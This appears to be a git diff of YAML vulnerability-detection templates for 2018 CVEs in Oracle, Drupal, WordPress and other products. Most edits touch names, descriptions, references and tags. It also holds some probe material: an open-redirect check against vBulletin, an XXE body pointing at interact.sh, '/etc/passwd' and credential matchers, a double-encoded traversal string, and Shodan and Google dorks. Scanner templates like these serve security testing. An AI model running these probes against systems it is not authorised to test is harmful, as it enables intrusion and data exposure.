     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-2628
     cwe-id: CWE-502
-  tags: cve,cve2018,oracle,weblogic,network,deserialization
+  tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
 
 network:
   - inputs:
diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml
index 0d0071f34e..dd33b5bb9a 100644
--- a/cves/2018/CVE-2018-2791.yaml
+++ b/cves/2018/CVE-2018-2791.yaml
@@ -4,14 +4,11 @@ info:
   name: Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting
   author: madrobot,leovalcante
   severity: high
-  description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP
-    to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while
-    the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access
-    to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
+  description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
   reference:
     - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
-    - http://www.securitytracker.com/id/1040695
-    - http://www.securityfocus.com/bid/103800
+    - http://web.archive.org/web/20211206165005/https://securitytracker.com/id/1040695
+    - http://web.archive.org/web/20210124161821/https://www.securityfocus.com/bid/103800/
     - https://www.exploit-db.com/exploits/44752/
     - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
     - https://nvd.nist.gov/vuln/detail/CVE-2018-2791
@@ -19,7 +16,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
     cvss-score: 8.2
     cve-id: CVE-2018-2791
-  tags: cve,cve2018,oracle,xss,wcs
+  tags: edb,cve,cve2018,oracle,xss,wcs
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml
index 0885ed1196..e7ba463a2a 100644
--- a/cves/2018/CVE-2018-2893.yaml
+++ b/cves/2018/CVE-2018-2893.yaml
@@ -10,6 +10,7 @@ info:
     - https://www.anquanke.com/post/id/152164
     - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL
     - https://nvd.nist.gov/vuln/detail/CVE-2018-2893
+    - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml
index ce5ace24c1..b0e0bed17a 100644
--- a/cves/2018/CVE-2018-2894.yaml
+++ b/cves/2018/CVE-2018-2894.yaml
@@ -10,11 +10,12 @@ info:
     - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
     - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894
     - https://nvd.nist.gov/vuln/detail/CVE-2018-2894
+    - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-2894
-  tags: cve,cve2018,oracle,weblogic,rce
+  tags: cve2018,oracle,weblogic,rce,vulhub,cve
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml
index ce3dce57f2..83028f7e5c 100644
--- a/cves/2018/CVE-2018-3167.yaml
+++ b/cves/2018/CVE-2018-3167.yaml
@@ -7,8 +7,8 @@ info:
   description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
   reference:
     - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
-    - http://www.securitytracker.com/id/1041897
-    - http://www.securityfocus.com/bid/105627
+    - http://web.archive.org/web/20211206102649/https://securitytracker.com/id/1041897
+    - http://web.archive.org/web/20210516175216/https://www.securityfocus.com/bid/105627
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -20,7 +20,7 @@ requests:
     path:
       - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
 
-    body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://example.com">
+    body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">
 
     matchers-condition: and
     matchers:
diff --git a/cves/2018/CVE-2018-3238.yaml b/cves/2018/CVE-2018-3238.yaml
index 83a32605bd..e8738fc6b3 100644
--- a/cves/2018/CVE-2018-3238.yaml
+++ b/cves/2018/CVE-2018-3238.yaml
@@ -3,12 +3,13 @@ id: CVE-2018-3238
 info:
   name: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting
   author: leovalcante
-  severity: high
+  severity: medium
   description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.
   reference:
     - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
     - https://www.oracle.com/security-alerts/cpuoct2018.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-3238
+    - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
     cvss-score: 6.9
diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml
index 50093afd70..9e5d13f0bd 100644
--- a/cves/2018/CVE-2018-3714.yaml
+++ b/cves/2018/CVE-2018-3714.yaml
@@ -1,18 +1,19 @@
 id: CVE-2018-3714
 
 info:
-  name: node-srv Path Traversal
+  name: node-srv - Local File Inclusion
   author: madrobot
   severity: medium
-  description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path.
+  description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.
   reference:
     - https://hackerone.com/reports/309124
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-3714
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2018-3714
     cwe-id: CWE-22
-  tags: cve,cve2018,nodejs,lfi
+  tags: cve,cve2018,nodejs,lfi,hackerone
 
 requests:
   - method: GET
@@ -27,3 +28,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml
index d4508b7285..a3eda2134c 100644
--- a/cves/2018/CVE-2018-3760.yaml
+++ b/cves/2018/CVE-2018-3760.yaml
@@ -1,23 +1,23 @@
 id: CVE-2018-3760
 
 info:
-  name: Ruby On Rails Path Traversal
+  name: Ruby On Rails - Local File Inclusion
   author: 0xrudra,pikpikcu
   severity: high
   description: |
-    Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files.
-    There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
+    Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
     - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
     - https://seclists.org/oss-sec/2018/q2/210
     - https://xz.aliyun.com/t/2542
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-3760
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-3760
     cwe-id: CWE-200
-  tags: cve,cve2018,rails,lfi,ruby
+  tags: cve,cve2018,rails,lfi,ruby,vulhub,seclists
 
 requests:
   - raw:
@@ -46,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml
index 69322dfcea..44ba97199a 100644
--- a/cves/2018/CVE-2018-3810.yaml
+++ b/cves/2018/CVE-2018-3810.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/43420
     - https://nvd.nist.gov/vuln/detail/CVE-2018-3810
+    - https://wordpress.org/plugins/smart-google-code-inserter/#developers
+    - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-3810
     cwe-id: CWE-287
-  tags: wordpress,cve,cve2018,google
+  tags: wordpress,cve,cve2018,google,edb
 
 requests:
   - method: POST
diff --git a/cves/2018/CVE-2018-5230.yaml b/cves/2018/CVE-2018-5230.yaml
index ec997e4f28..c3a3a63f17 100644
--- a/cves/2018/CVE-2018-5230.yaml
+++ b/cves/2018/CVE-2018-5230.yaml
@@ -1,13 +1,14 @@
 id: CVE-2018-5230
 
 info:
-  name: Atlassian Confluence Status-List XSS
+  name: Atlassian Jira Confluence - Cross-Site Scripting
   author: madrobot
   severity: medium
   description: |
-    The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified.
+    Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified.
   reference:
     - https://jira.atlassian.com/browse/JRASERVER-67289
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-5230
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,4 +39,6 @@ requests:
       - type: word
         part: header
         words:
-          - 'text/html'
\ No newline at end of file
+          - 'text/html'
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2018/CVE-2018-5233.yaml b/cves/2018/CVE-2018-5233.yaml
index f36c245b9e..908f6d4015 100644
--- a/cves/2018/CVE-2018-5233.yaml
+++ b/cves/2018/CVE-2018-5233.yaml
@@ -1,12 +1,14 @@
 id: CVE-2018-5233
 
 info:
-  name: Grav CMS before 1.3.0 allows XSS.
+  name: Grav CMS <1.3.0 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
+    Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
   reference:
+    - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/
+    - http://www.openwall.com/lists/oss-security/2018/03/15/1
     - https://nvd.nist.gov/vuln/detail/CVE-2018-5233
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml
index 09b6ca3253..ceb94ae6bf 100644
--- a/cves/2018/CVE-2018-5316.yaml
+++ b/cves/2018/CVE-2018-5316.yaml
@@ -1,18 +1,21 @@
 id: CVE-2018-5316
 
 info:
-  name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+  description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter.
   reference:
+    - https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337
+    - https://wordpress.org/plugins/sagepay-server-gateway-for-woocommerce/#developers
+    - https://packetstormsecurity.com/files/145459/WordPress-Sagepay-Server-Gateway-For-WooCommerce-1.0.7-XSS.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-5316
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-5316
     cwe-id: CWE-79
-  tags: cve,cve2018,wordpress,xss,wp-plugin,woocommerce
+  tags: cve2018,wordpress,xss,wp-plugin,woocommerce,packetstorm,cve
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-5715.yaml b/cves/2018/CVE-2018-5715.yaml
index 40451b7b2c..5097ee9d4b 100644
--- a/cves/2018/CVE-2018-5715.yaml
+++ b/cves/2018/CVE-2018-5715.yaml
@@ -1,22 +1,24 @@
 id: CVE-2018-5715
 
 info:
-  name: SugarCRM 3.5.1 - Reflected XSS
+  name: SugarCRM 3.5.1 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
+  description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
   reference:
     - https://www.exploit-db.com/exploits/43683
+    - https://m4k4br0.github.io/sugarcrm-xss/
+    - https://www.exploit-db.com/exploits/43683/
     - https://nvd.nist.gov/vuln/detail/CVE-2018-5715
-  metadata:
-    shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
-    google-dork: intext:"SugarCRM Inc. All Rights Reserved"
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-5715
     cwe-id: CWE-79
-  tags: cve,cve2018,sugarcrm,xss
+  metadata:
+    google-query: intext:"SugarCRM Inc. All Rights Reserved"
+    shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
+  tags: sugarcrm,xss,edb,cve,cve2018
 
 requests:
   - method: GET
@@ -38,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml
index f13dbcb2c2..35dc3a319d 100644
--- a/cves/2018/CVE-2018-6008.yaml
+++ b/cves/2018/CVE-2018-6008.yaml
@@ -1,19 +1,21 @@
 id: CVE-2018-6008
 
 info:
-  name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Retrieval
+  name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Arbitrary file retrieval exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
+  description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
   reference:
     - https://www.exploit-db.com/exploits/43913
     - https://www.cvedetails.com/cve/CVE-2018-6008
+    - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-6008
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-6008
     cwe-id: CWE-200
-  tags: cve,cve2018,joomla,lfi
+  tags: cve,cve2018,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2018/CVE-2018-6200.yaml b/cves/2018/CVE-2018-6200.yaml
new file mode 100644
index 0000000000..3ef39cbffe
--- /dev/null
+++ b/cves/2018/CVE-2018-6200.yaml
@@ -0,0 +1,37 @@
+id: CVE-2018-6200
+
+info:
+  name: vBulletin 3.x.x & 4.2.x - Open Redirect
+  author: 0x_Akoko,daffainfo
+  severity: medium
+  description: |
+    vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2018010251
+    - https://www.cvedetails.com/cve/CVE-2018-6200
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-6200
+    cwe-id: CWE-601
+  metadata:
+    verified: true
+  tags: cve,cve2018,redirect,vbulletin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/redirector.php?url=https://interact.sh'
+      - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '<meta http-equiv="refresh" content="0; URL=https://interact.sh">'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2018/CVE-2018-6910.yaml b/cves/2018/CVE-2018-6910.yaml
index 380833fb49..508338e6c6 100644
--- a/cves/2018/CVE-2018-6910.yaml
+++ b/cves/2018/CVE-2018-6910.yaml
@@ -1,17 +1,20 @@
 id: CVE-2018-6910
 
 info:
-  name: DedeCMS 5.7 path disclosure
+  name: DedeCMS 5.7 - Path Disclosure
   author: pikpikcu
-  severity: medium
+  severity: high
   description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2018-6910
+    - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
+    - https://kongxin.gitbook.io/dedecms-5-7-bug/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-6910
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2018-6910
-    cwe-id: CWE-200
+    cwe-id: CWE-668
   tags: cve,cve2018,dedecms
 
 requests:
@@ -32,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml
index 90f7adb2ad..f05000b3c9 100644
--- a/cves/2018/CVE-2018-7251.yaml
+++ b/cves/2018/CVE-2018-7251.yaml
@@ -8,7 +8,7 @@ info:
     Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue  in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
   reference:
     - https://github.com/anchorcms/anchor-cms/issues/1247
-    - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html
+    - https://web.archive.org/web/20180316162048/https://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html
     - https://twitter.com/finnwea/status/965279233030393856
     - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html
     - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7
@@ -18,7 +18,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-7251
     cwe-id: CWE-200
-  tags: cve,cve2018,anchorcms,logs,error
+  tags: cve,cve2018,anchorcms,logs,error,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml
index d2e79785f8..1a5613fe9d 100644
--- a/cves/2018/CVE-2018-7422.yaml
+++ b/cves/2018/CVE-2018-7422.yaml
@@ -1,18 +1,22 @@
 id: CVE-2018-7422
 
 info:
-  name: WordPress Site Editor Plugin LFI
+  name: WordPress Site Editor <=1.1.1 - Local File Inclusion
   author: LuskaBol,0x240x23elu
   severity: high
-  description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
+  description: |
+    WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
   reference:
     - https://www.exploit-db.com/exploits/44340
+    - http://seclists.org/fulldisclosure/2018/Mar/40
+    - https://wpvulndb.com/vulnerabilities/9044
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-7422
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-7422
     cwe-id: CWE-22,CWE-829
-  tags: cve,cve2018,wordpress,wp-plugin,lfi
+  tags: cve,cve2018,wordpress,wp-plugin,lfi,edb,seclists
 
 requests:
   - method: GET
@@ -23,13 +27,15 @@ requests:
     matchers-condition: or
     matchers:
       - type: word
+        part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
-        part: body
         condition: and
 
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
\ No newline at end of file
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2018/CVE-2018-7467.yaml b/cves/2018/CVE-2018-7467.yaml
index 79f40265dc..2ffec8bec2 100644
--- a/cves/2018/CVE-2018-7467.yaml
+++ b/cves/2018/CVE-2018-7467.yaml
@@ -1,19 +1,20 @@
 id: CVE-2018-7467
 
 info:
-  name: AxxonSoft Axxon Next Directory Traversal
+  name: AxxonSoft Axxon Next - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
+  description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.
   reference:
     - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
+    - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467
     - https://nvd.nist.gov/vuln/detail/CVE-2018-7467
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-7467
     cwe-id: CWE-200
-  tags: cve,cve2018,axxonsoft,lfi
+  tags: axxonsoft,lfi,packetstorm,cve,cve2018
 
 requests:
   - raw:
@@ -30,3 +31,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/06/16
diff --git a/cves/2018/CVE-2018-7490.yaml b/cves/2018/CVE-2018-7490.yaml
index 36e7640822..4d46603b6a 100644
--- a/cves/2018/CVE-2018-7490.yaml
+++ b/cves/2018/CVE-2018-7490.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2018-7490
     cwe-id: CWE-22
-  tags: cve,cve2018,uwsgi,php,lfi,plugin
+  tags: cve,cve2018,uwsgi,php,lfi,plugin,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml
index fec50a358e..bf7b4ce663 100644
--- a/cves/2018/CVE-2018-7600.yaml
+++ b/cves/2018/CVE-2018-7600.yaml
@@ -8,12 +8,16 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
     - https://nvd.nist.gov/vuln/detail/CVE-2018-7600
+    - https://www.drupal.org/sa-core-2018-002
+    - https://groups.drupal.org/security/faq-2018-002
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-7600
     cwe-id: CWE-20
-  tags: cve,cve2018,drupal,rce
+  metadata:
+    shodan-query: http.component:"drupal"
+  tags: cve,cve2018,drupal,rce,kev,cisa,vulhub
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-7602.yaml b/cves/2018/CVE-2018-7602.yaml
index 6964122f03..37170ea82b 100644
--- a/cves/2018/CVE-2018-7602.yaml
+++ b/cves/2018/CVE-2018-7602.yaml
@@ -8,11 +8,15 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
     - https://nvd.nist.gov/vuln/detail/CVE-2018-7602
+    - https://www.drupal.org/sa-core-2018-004
+    - https://www.exploit-db.com/exploits/44557/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-7602
-  tags: cve,cve2018,drupal,authenticated
+  metadata:
+    shodan-query: http.component:"drupal"
+  tags: cve2018,drupal,authenticated,kev,cisa,vulhub,edb,cve
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-7700.yaml b/cves/2018/CVE-2018-7700.yaml
index 77f1427c57..5e1a7ce88a 100644
--- a/cves/2018/CVE-2018-7700.yaml
+++ b/cves/2018/CVE-2018-7700.yaml
@@ -1,12 +1,14 @@
 id: CVE-2018-7700
 
 info:
-  name: DedeCMS V5.7SP2 RCE
+  name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution
   author: pikpikcu
   severity: high
-  description: DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
+  description: |
+    DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
   reference:
     - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-7700
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -23,12 +25,14 @@ requests:
     matchers:
 
       - type: word
+        part: body
         words:
           - "phpinfo"
           - "PHP Version"
-        part: body
         condition: and
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/16
diff --git a/cves/2018/CVE-2018-7719.yaml b/cves/2018/CVE-2018-7719.yaml
index 069b187a78..0736b1deec 100644
--- a/cves/2018/CVE-2018-7719.yaml
+++ b/cves/2018/CVE-2018-7719.yaml
@@ -1,19 +1,23 @@
 id: CVE-2018-7719
 
 info:
-  name: Acrolinx Server Directory Traversal
+  name: Acrolinx Server <5.2.5 - Local File Inclusion
   author: 0x_akoko
   severity: high
-  description: Acrolinux Server versions prior to 5.2.5 suffer from a directory traversal vulnerability.
+  description: |
+    Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
   reference:
     - https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html
     - https://www.cvedetails.com/cve/CVE-2018-7719
+    - https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases-
+    - https://www.exploit-db.com/exploits/44345/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-7719
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-7719
     cwe-id: CWE-22
-  tags: cve,cve2018,acrolinx,lfi
+  tags: cve,cve2018,acrolinx,lfi,packetstorm,edb
 
 requests:
   - raw:
@@ -29,4 +33,6 @@ requests:
           - "bit app support"
           - "fonts"
           - "extensions"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/06/17
